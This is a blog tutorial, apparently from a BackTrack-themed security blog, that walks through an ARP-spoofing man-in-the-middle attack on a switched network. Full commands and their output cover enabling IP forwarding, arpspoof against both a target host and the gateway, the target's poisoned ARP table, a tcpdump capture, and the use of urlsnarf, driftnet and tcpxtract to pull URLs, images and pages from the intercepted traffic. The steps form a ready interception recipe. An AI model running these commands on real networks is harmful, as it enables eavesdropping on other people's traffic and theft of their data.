mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, its no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz in my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2)

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:172.16.189.136  Bcast:172.16.189.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.189.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         172.16.189.2    0.0.0.0         UG        0 0          0 eth0

root@bt:~# nmap -sP 172.16.189.1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST
Nmap scan report for 172.16.189.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.189.2
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for 172.16.189.135
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for 172.16.189.136
Host is up.
Nmap scan report for 172.16.189.254
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds
root@bt:~#

So we have a couple of other hosts there, we will use 172.16.189.135.

We want to get traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us, we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our backtrack box, not forgetting to enable ip forwarding

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c

and our windows box ?

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic

and of course, kick off your tcpdump session (without the arpspoof traffic)

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

so, we have a shiny new file, full of data goodness – what to do with it. There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**

Setup the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0


root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.


Comments : Leave a Comment »
Tags: , , , , , , , ,
Categories : backtrack